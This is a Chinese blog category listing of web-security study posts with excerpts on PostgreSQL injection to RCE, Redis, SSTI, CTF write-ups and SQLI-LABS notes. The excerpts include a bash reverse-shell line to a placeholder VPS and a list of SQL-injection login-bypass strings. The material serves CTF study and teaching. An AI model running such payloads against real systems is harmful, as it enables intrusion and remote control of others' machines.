
WEB学习
文章平均质量分 85
郁离歌
这个作者很懒,什么都没留下…
展开
-
记一次Postgresql从堆叠注入到RCE
记一次Postgresql从堆叠注入到RCE文章目录记一次Postgresql从堆叠注入到RCE限制udfhackbypasssqlmap的思路rwctf2021-DBaaSadge闲话本次研究过程来自一次某cms的代码审计实战,整个环境部署的相对较好,postgresql、web权限都有单独的用户管理,web目录不可写、服务器不能出网等限制。不过比较幸运的是所有的数据操作都是用同一个superuser权限的postgresql用户来执行的。限制审计发现某处存在postgresql堆叠注入,发现po原创 2021-02-01 09:45:04 · 1552 阅读 · 0 评论 -
redis安全学习笔记
redis安全学习笔记[toc]文章部分内容首发于xray社区公众号基础https://www.runoob.com/redis/redis-tutorial.html环境 : ubuntu 安装redis$sudo apt-get update$sudo apt-get install redis-server$service redis-server start$redis-cliredis连接命令redis-cli -h 127.0.0.1 -p 6379设置键值对:s原创 2020-05-29 00:55:33 · 5366 阅读 · 2 评论 -
Ubuntu1804安装mysql5.7无法更改root密码问题
Ubuntu1804安装mysql5.7无法更改root密码问题昨天重装blog,好久没更新了打算发一些本地的笔记出来,就顺手把服务器镜像换了下。换成了ubuntu1804,然后安装mysql是装的5.7版本,发现无论怎么都改不了密码,或者说无论怎么改密码,登陆都不需要密码。查了一堆资料,发现我这种情况恰好是开启skip-grant-tables的情况,但是又没开,因为开了skip-grant-tables是没法用mysqladmin去改密码的,会有一个报错。后来查到资料是需要删除原本的root用户,再原创 2020-05-08 19:52:36 · 327 阅读 · 2 评论 -
python安全之学习笔记(一)
暑假想深入学习下pythonweb的,结果被一堆事缠着,只能勉勉强强看了下ssti模板注入的一些东西。真的是菜的糟心,暑假又是一事无成。0X00.浅谈关于python引发的安全问题pythonweb的话代码方面的问题最多的可能就是SSTI模板注入、沙盒逃逸及反序列化,一般来说,使用django的模板渲染能够抵御很多的xss攻击,sql注入现在确实已经很少了,orm框架的使用,导致sql注入...原创 2018-09-29 00:03:39 · 4256 阅读 · 0 评论 -
EDU-CTF Final 2018 Web小记
EDU-CTF Final 2018 Web小记文章首发于安全客:https://www.anquanke.com/post/id/170361当时比赛的时候正在复习期末,根本没空玩。昨天考完科二,终于有时间仔细看看了。TwoFile直接给出源码,要命令执行<?phphighlight_file(__FILE__);$file1 = $_GET['f1'];$file2 ...原创 2019-01-29 15:55:33 · 704 阅读 · 0 评论 -
WordPress 5.0.0 Remote Code Execution分析思考
WordPress 5.0.0 Remote Code Execution分析思考本文首发于安全客:https://www.anquanke.com/post/id/173173前言2月20号,RIPS团队在官网公开了一篇WordPress 5.0.0 Remote Code Execution,CVE编号CVE-2019-6977,文章中主要提到在author权限账号下,可以通过修改Pos...原创 2019-03-20 22:37:36 · 826 阅读 · 0 评论 -
FireShell CTF 2019小记
FireShell CTF 2019小记8说了,国际赛的难度大家都晓得滴。看题Python Learning Environment沙盒逃逸orz,最近喜欢玩的一个东东。在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...原创 2019-03-20 22:38:37 · 1041 阅读 · 0 评论 -
CONFidence CTF 2019-Web 50分析思考
CONFidence CTF 2019-Web 50分析思考当时没做出来,也有看到外国大师傅用缓存投毒非预期的。我还是太菜了orz。首先是一个非常简陋的登陆页面,随手输入一个没人用的用户名,即可注册登陆。两个功能,一个报告bug,一个修改个人信息。经过简单fuzz之后明显可以发现报告bug页面是管理员查看该域名下的某处页面。而修改个人信息页面的shoesize可以selfxss,因为...原创 2019-03-20 23:06:23 · 785 阅读 · 0 评论 -
0CTF/TCTF2019 Ghost Pepper Writeup
0CTF/TCTF Ghost Pepper Writeup签到成功,告辞。首先发现401一个登陆框,弱口令什么的都试试发现不行。抓包发现返回包里面有karaf的字样。谷歌搜索一波搜到了相关资料:https://karaf.apache.org/manual/latest/webconsole里面说到:The Apache Karaf WebConsole uses the WebCont...原创 2019-03-25 16:00:19 · 1487 阅读 · 2 评论 -
APP渗透测试准备(一)
APP渗透测试准备(一)文章目录APP渗透测试准备(一)环境准备安装adb安装fridafrida hook实例环境准备Windows10 X64Python 3.7OppoR9st anroid6.0.1adbfridaburpsuite+brida插件安装adb参考链接:https://wnma3mz.github.io/hexo_blog/2018/01/25/%E7%...原创 2019-10-05 21:11:13 · 5411 阅读 · 1 评论 -
docker环境搭建之phpMyAdmin
近来由于某种原因xxx自己用docker搭建一个phpMyAdmin环境复现一个缓存文件包含的漏洞。把各个坑都踩了遍。这里记录一下。新手上路,大佬勿喷。我这里使用的镜像是ubuntu:16.04首先环境起来之后发现报错:1、没有找到 PHP 扩展 mbstring,而您现在好像在使用多字节字符集。解决方法:Dockerfile里面加一条 RUN apt-get insta...原创 2018-09-16 12:47:29 · 1887 阅读 · 0 评论 -
某入群题之命令执行字符限制绕过(WEB100)
某入群题又来啦!由于之前刚好做了下hitcon的两个命令执行绕过,问了下pcat能不能写这篇文章。然后他说随便我.....这里就记录一下。看题!类似上次的两题,只是这次字符长度限制变成了20。心中一喜,直接拿上次的exp打了一发。然后发现gg。上次的两题的具体分析可以看我之前的文章。上次的exp在这里不能用的原因是bash、python这些都ban了,不能直接弹shell。但是思路还是能用的。0X...原创 2018-07-13 16:30:50 · 2207 阅读 · 0 评论 -
HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_2/index.php发现和上一题大体相似,但是发现有一个不一样,长度从5变成了4,没办法利用>>二次写入了。但是我们如果就这样是没法儿按照字典序直接写入ls -t>g到文件的。 因为这一串无论怎么分割写入都无法遵从字典序或是字典序的逆序。然...原创 2018-05-07 21:30:18 · 1255 阅读 · 0 评论 -
SQLI-LABS修炼笔记(五)
写在前面:今天介绍的是post注入。自己总结了一些万能密码:1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13:...原创 2018-03-08 18:25:04 · 821 阅读 · 0 评论 -
SQLI-LABS修炼笔记(一)
写在前面:作为一个萌新,想自己搭一个sqli-labs,中间历经了无数艰难,我win10系统用的是xampp,结果搭起来发现php版本太高了,xampp用的是php7以上的,然后自己用docker搭了一个,在ubantu用lamp搭了一个,又用phpstudy搭了一个,在自己服务器上弄了一个233333不说了进入正题。 less-11.找到注入点,发现报错回显。http://43.247.91.2...原创 2018-03-03 13:12:20 · 1172 阅读 · 0 评论 -
SQLI-LABS修炼笔记(二)
写在前面:今天的重点是盲注。首先介绍一下sql注入截取字符串常用函数有三大法宝。mid(),substr(),left()1.mid()函数MID(column_name,start[,length])如: str="123456" mid(str,2,1) 结果为2Sql用例:(1)MID(DATABASE(),1,1)>’a’,查看数据库名第一位,MID(DATABASE(),2,1)查...原创 2018-03-04 14:18:50 · 1060 阅读 · 0 评论 -
SQLI-LABS修炼笔记(三)
写在前面:导入导出相关操作的讲解:1、load_file()导出文件Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。使用条件:A、必须有权限读取并且文件必须完全可读and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。and (select count(*) from mysql.user)...原创 2018-03-05 22:21:56 · 504 阅读 · 0 评论 -
SQL注入之报错注入的一些随笔
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...原创 2018-03-21 21:37:13 · 4651 阅读 · 0 评论 -
HITCON 2017 babyfirst-revenge(命令执行绕过三)
今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的修炼了。其实已经12点,注定今天又做不了多少。估计要被梅子酒笑话了md...再理一下之前有的思路:1.利用'>'+'字符'+'\'+'\'几个字符创建文件(ps:'\'是会把后面的转义掉的,所以如果要让他出现在文件名中,就得用两个\\2.使用ls串接命令可以用ls -t (ps:ls -t...原创 2018-05-02 00:40:58 · 923 阅读 · 0 评论 -
HITCON 2017 babyfirst-revenge(命令执行绕过四)
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i >& /dev/tcp/vpsip/vpsport 0&l...原创 2018-05-03 00:36:48 · 741 阅读 · 0 评论 -
HITCON 2015 lalala(SSRF)
题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php一个文件上传题,尝试上传个图片,结果:好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。但是就目前来看似乎可以SSRF.什么是ssrf?是时候系统的学一波了。参考链接:《SSRF漏洞中绕过IP限制的几种方法总结》《SSRF攻击原理与技巧...原创 2018-05-09 17:47:44 · 1967 阅读 · 0 评论 -
HITCON 2015 BabyFirst(命令执行绕正则)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_4/index.php借上次的docker环境,稍微改了下。本地搭了个环境玩。代码审计,整个程序的逻辑是为一个客户端创建一个sandbox/clientip的目录,通过正则表达检查参数值,要求所有的参数仅仅只能为数字和字母。而/bin/orange最终发现只是...原创 2018-05-16 22:44:35 · 1801 阅读 · 0 评论 -
HITCON 2017 babyfirst-revenge(命令执行绕过一)
院科协换届...10点才去大活打开电脑...修炼第一天怕是只能看个题了....题目链接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_1/Chall_1.md审计了一下,大概就是考linux命令执行的绕过,命令长度限制了。直接对着代码想了好久,无果。梅子酒说先搭起环境来,再慢慢搞。WEB学习第一步:搭环境,改bug...原创 2018-04-28 00:36:23 · 2884 阅读 · 0 评论 -
HITCON 2017 babyfirst-revenge(命令执行绕过二)
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...原创 2018-04-30 00:19:58 · 1057 阅读 · 0 评论 -
SQLI-LABS修炼笔记(四)
写在前面:今天介绍基于时间的盲注。我们利用延时注入进行,同时id 参数进行的是一定的处理。主要使用的函数有if()、sleep()、BENCHMARK()1.if语句/if()函数在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确:if condition then do_something else do_something_else11即如果某条件发生,那么执行语句一;否则...原创 2018-03-06 22:50:36 · 475 阅读 · 0 评论